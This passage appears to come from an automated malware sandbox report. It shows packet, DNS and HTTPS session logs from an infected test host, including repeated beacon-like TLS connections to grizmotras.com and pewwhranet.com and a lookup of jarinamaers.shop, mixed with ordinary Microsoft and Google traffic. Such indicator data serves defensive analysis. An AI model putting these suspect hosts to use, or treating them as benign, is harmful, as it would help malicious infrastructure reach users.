                                                                                                Apr 26, 2024 23:22:07.782577038 CEST44349809172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:07.782716990 CEST49809443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:07.786662102 CEST49809443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:07.786681890 CEST44349809172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:08.046407938 CEST44349809172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:08.051464081 CEST49809443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:08.053030014 CEST49809443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:08.053030014 CEST49809443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:08.053040028 CEST44349809172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:08.053056955 CEST44349809172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:12.061878920 CEST49809443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:12.065882921 CEST49810443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:12.065920115 CEST44349810104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:12.066239119 CEST49810443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:12.066239119 CEST49810443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:12.066298008 CEST44349810104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:12.325141907 CEST44349810104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:12.325227976 CEST49810443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:12.325714111 CEST49810443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:12.325721979 CEST44349810104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:12.327321053 CEST49810443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:12.327327013 CEST44349810104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:16.333913088 CEST49810443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:16.337518930 CEST49811443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:16.337563992 CEST44349811172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:16.337739944 CEST49811443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:16.337959051 CEST49811443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:16.337976933 CEST44349811172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:16.596765995 CEST44349811172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:16.596904993 CEST49811443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:16.597300053 CEST49811443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:16.597307920 CEST44349811172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:16.598429918 CEST49811443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:16.598436117 CEST44349811172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:20.599394083 CEST49811443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:20.603148937 CEST49812443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:20.603192091 CEST44349812104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:20.603270054 CEST49812443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:20.603509903 CEST49812443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:20.603528976 CEST44349812104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:20.861912012 CEST44349812104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:20.861978054 CEST49812443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:20.862462044 CEST49812443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:20.862476110 CEST44349812104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:20.863686085 CEST49812443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:20.863693953 CEST44349812104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:24.864126921 CEST49812443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:24.867286921 CEST49813443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:24.867371082 CEST44349813172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:24.867458105 CEST49813443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:24.867676973 CEST49813443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:24.867712975 CEST44349813172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:25.128783941 CEST44349813172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:25.128866911 CEST49813443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:25.129365921 CEST49813443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:25.129379034 CEST44349813172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:25.130620003 CEST49813443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:25.130628109 CEST44349813172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:29.132113934 CEST49813443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:29.139381886 CEST49814443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:29.139430046 CEST44349814104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:29.139509916 CEST49814443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:29.139820099 CEST49814443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:29.139838934 CEST44349814104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:29.398984909 CEST44349814104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:29.401796103 CEST49814443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:29.403641939 CEST49814443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:29.403641939 CEST49814443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:29.403655052 CEST44349814104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:29.403671980 CEST44349814104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:33.415390015 CEST49814443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:33.419380903 CEST49815443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:33.419418097 CEST44349815172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:33.419493914 CEST49815443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:33.419775963 CEST49815443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:33.419787884 CEST44349815172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:33.684248924 CEST44349815172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:33.687472105 CEST49815443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:33.689301968 CEST49815443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:33.689302921 CEST49815443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:33.689308882 CEST44349815172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:33.689332962 CEST44349815172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:37.695405960 CEST49815443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:37.698370934 CEST49816443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:37.698419094 CEST44349816104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:37.701562881 CEST49816443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:37.707417011 CEST49816443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:37.707434893 CEST44349816104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:37.974126101 CEST44349816104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:37.974206924 CEST49816443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:37.974817038 CEST49816443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:37.974822998 CEST44349816104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:37.989474058 CEST49816443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:37.989481926 CEST44349816104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:41.995268106 CEST49816443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:41.995271921 CEST49817443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:41.995309114 CEST44349817172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:41.995450020 CEST49817443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:41.997587919 CEST49817443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:41.997597933 CEST44349817172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:42.257719040 CEST44349817172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:42.257823944 CEST49817443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:42.259798050 CEST49817443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:42.259798050 CEST49817443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:42.259807110 CEST44349817172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:42.259818077 CEST44349817172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:46.272536993 CEST49817443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:46.276422977 CEST49818443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:46.276464939 CEST44349818104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:46.276873112 CEST49818443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:46.278379917 CEST49818443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:46.278393984 CEST44349818104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:46.543699026 CEST44349818104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:46.543803930 CEST49818443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:46.544260025 CEST49818443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:46.544267893 CEST44349818104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:46.545378923 CEST49818443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:46.545387030 CEST44349818104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:22:50.553956985 CEST49818443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:22:50.556837082 CEST49819443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:50.556873083 CEST44349819172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:50.556941032 CEST49819443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:50.557214975 CEST49819443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:50.557229042 CEST44349819172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:50.824055910 CEST44349819172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:22:50.824126005 CEST49819443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:22:50.824614048 CEST49819443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:24:03.022876978 CEST49836443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:03.022921085 CEST44349836104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:03.022984982 CEST49836443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:03.023253918 CEST49836443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:03.023267984 CEST44349836104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:03.287972927 CEST44349836104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:03.288037062 CEST49836443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:03.288837910 CEST49836443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:03.288850069 CEST44349836104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:03.300769091 CEST49836443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:03.300776958 CEST44349836104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:07.288047075 CEST49836443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:07.292155027 CEST49837443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:07.292210102 CEST44349837104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:24:07.292282104 CEST49837443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:07.292579889 CEST49837443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:07.292598963 CEST44349837104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:24:07.554928064 CEST44349837104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:24:07.559535980 CEST49837443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:07.561058998 CEST49837443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:07.561058998 CEST49837443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:07.561070919 CEST44349837104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:24:07.561086893 CEST44349837104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:24:11.571453094 CEST49837443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:11.572968006 CEST49838443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:11.573019028 CEST44349838104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:11.573206902 CEST49838443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:11.574619055 CEST49838443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:11.574642897 CEST44349838104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:11.836810112 CEST44349838104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:11.836983919 CEST49838443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:11.837433100 CEST49838443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:11.837445021 CEST44349838104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:11.838799953 CEST49838443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:11.838815928 CEST44349838104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:15.853511095 CEST49838443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:15.853534937 CEST49839443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:15.853631973 CEST44349839104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:24:15.858119011 CEST49839443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:15.858251095 CEST49839443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:15.858289003 CEST44349839104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:24:16.117537022 CEST44349839104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:24:16.119585991 CEST49839443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:16.121666908 CEST49839443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:16.121666908 CEST49839443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:16.121695042 CEST44349839104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:24:16.121732950 CEST44349839104.21.84.207192.168.2.5
                                                                                                Apr 26, 2024 23:24:20.133481026 CEST49839443192.168.2.5104.21.84.207
                                                                                                Apr 26, 2024 23:24:20.135325909 CEST49840443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:20.135370016 CEST44349840104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:20.135519028 CEST49840443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:20.135699987 CEST49840443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:20.135714054 CEST44349840104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:20.393322945 CEST44349840104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:20.394555092 CEST49840443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:20.396128893 CEST49840443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:20.396130085 CEST49840443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:20.396151066 CEST44349840104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:20.396171093 CEST44349840104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.330960035 CEST44349840104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.331095934 CEST44349840104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.331212997 CEST49840443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.331459999 CEST49840443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.331476927 CEST44349840104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.399895906 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.399936914 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.400130033 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.403505087 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.403522015 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.662771940 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.662858009 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.663444042 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.663453102 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.665005922 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.665011883 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.604988098 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.605051041 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.605070114 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.605119944 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.605127096 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.605202913 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.605356932 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.605374098 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.674494982 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.674525976 CEST44349842104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.674593925 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.674839973 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.674845934 CEST44349842104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.934026957 CEST44349842104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.934087992 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.934567928 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.934582949 CEST44349842104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.946510077 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.946516991 CEST44349842104.21.59.82192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Apr 26, 2024 23:15:13.163482904 CEST | 192.168.2.5 | 1.1.1.1 | 0x972 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:15:13.163855076 CEST | 192.168.2.5 | 1.1.1.1 | 0x59da | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
| Apr 26, 2024 23:16:51.253603935 CEST | 192.168.2.5 | 1.1.1.1 | 0xbcc1 | Standard query (0) | jarinamaers.shop | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:17:23.700438976 CEST | 192.168.2.5 | 1.1.1.1 | 0x5bf6 | Standard query (0) | grizmotras.com | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:18:07.531179905 CEST | 192.168.2.5 | 1.1.1.1 | 0x613c | Standard query (0) | grizmotras.com | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:19:49.452280045 CEST | 192.168.2.5 | 1.1.1.1 | 0xfd43 | Standard query (0) | grizmotras.com | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:20:07.799391985 CEST | 192.168.2.5 | 1.1.1.1 | 0x4581 | Standard query (0) | pewwhranet.com | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:21:31.405543089 CEST | 192.168.2.5 | 1.1.1.1 | 0x4a72 | Standard query (0) | pewwhranet.com | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:23:13.335530996 CEST | 192.168.2.5 | 1.1.1.1 | 0xf059 | Standard query (0) | pewwhranet.com | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:23:24.682872057 CEST | 192.168.2.5 | 1.1.1.1 | 0xbbb3 | Standard query (0) | grizmotras.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Apr 26, 2024 23:15:13.289181948 CEST | 1.1.1.1 | 192.168.2.5 | 0x972 | No error (0) | www.google.com | | 142.250.217.228 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:15:13.289210081 CEST | 1.1.1.1 | 192.168.2.5 | 0x59da | No error (0) | www.google.com | | | 65 | IN (0x0001) | false |
| Apr 26, 2024 23:16:51.391927958 CEST | 1.1.1.1 | 192.168.2.5 | 0xbcc1 | No error (0) | jarinamaers.shop | | 104.21.46.75 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:16:51.391927958 CEST | 1.1.1.1 | 192.168.2.5 | 0xbcc1 | No error (0) | jarinamaers.shop | | 172.67.136.103 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:17:23.866564035 CEST | 1.1.1.1 | 192.168.2.5 | 0x5bf6 | No error (0) | grizmotras.com | | 172.67.219.28 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:17:23.866564035 CEST | 1.1.1.1 | 192.168.2.5 | 0x5bf6 | No error (0) | grizmotras.com | | 104.21.59.82 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:18:07.726401091 CEST | 1.1.1.1 | 192.168.2.5 | 0x613c | No error (0) | grizmotras.com | | 104.21.59.82 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:18:07.726401091 CEST | 1.1.1.1 | 192.168.2.5 | 0x613c | No error (0) | grizmotras.com | | 172.67.219.28 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:19:49.614212036 CEST | 1.1.1.1 | 192.168.2.5 | 0xfd43 | No error (0) | grizmotras.com | | 172.67.219.28 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:19:49.614212036 CEST | 1.1.1.1 | 192.168.2.5 | 0xfd43 | No error (0) | grizmotras.com | | 104.21.59.82 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:20:07.965384960 CEST | 1.1.1.1 | 192.168.2.5 | 0x4581 | No error (0) | pewwhranet.com | | 104.21.84.207 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:20:07.965384960 CEST | 1.1.1.1 | 192.168.2.5 | 0x4581 | No error (0) | pewwhranet.com | | 172.67.197.34 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:21:31.539031982 CEST | 1.1.1.1 | 192.168.2.5 | 0x4a72 | No error (0) | pewwhranet.com | | 172.67.197.34 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:21:31.539031982 CEST | 1.1.1.1 | 192.168.2.5 | 0x4a72 | No error (0) | pewwhranet.com | | 104.21.84.207 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:23:13.531917095 CEST | 1.1.1.1 | 192.168.2.5 | 0xf059 | No error (0) | pewwhranet.com | | 104.21.84.207 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:23:13.531917095 CEST | 1.1.1.1 | 192.168.2.5 | 0xf059 | No error (0) | pewwhranet.com | | 172.67.197.34 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:23:24.809706926 CEST | 1.1.1.1 | 192.168.2.5 | 0xbbb3 | No error (0) | grizmotras.com | | 104.21.59.82 | A (IP address) | IN (0x0001) | false |
| Apr 26, 2024 23:23:24.809706926 CEST | 1.1.1.1 | 192.168.2.5 | 0xbbb3 | No error (0) | grizmotras.com | | 172.67.219.28 | A (IP address) | IN (0x0001) | false |
                                                                                                • login.live.com
                                                                                                • www.google.com
                                                                                                • fs.microsoft.com
                                                                                                • slscr.update.microsoft.com
                                                                                                • https:
                                                                                                  • www.bing.com
                                                                                                • jarinamaers.shop
                                                                                                • grizmotras.com
                                                                                                • self.events.data.microsoft.com
                                                                                                • pewwhranet.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 40.126.28.23 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:11 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 3592
                                                                                                Host: login.live.com
2024-04-26 21:15:11 UTC | 3592 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-26 21:15:11 UTC | 568 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:11 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C555_SN1
                                                                                                x-ms-request-id: da6a79d2-0743-44a6-a39c-bfa5b5e8c7b4
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002FAB1 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:11 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 1276
2024-04-26 21:15:11 UTC | 1276 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 40.126.28.23 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:12 UTC | 446 | OUT | POST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 7642
                                                                                                Host: login.live.com
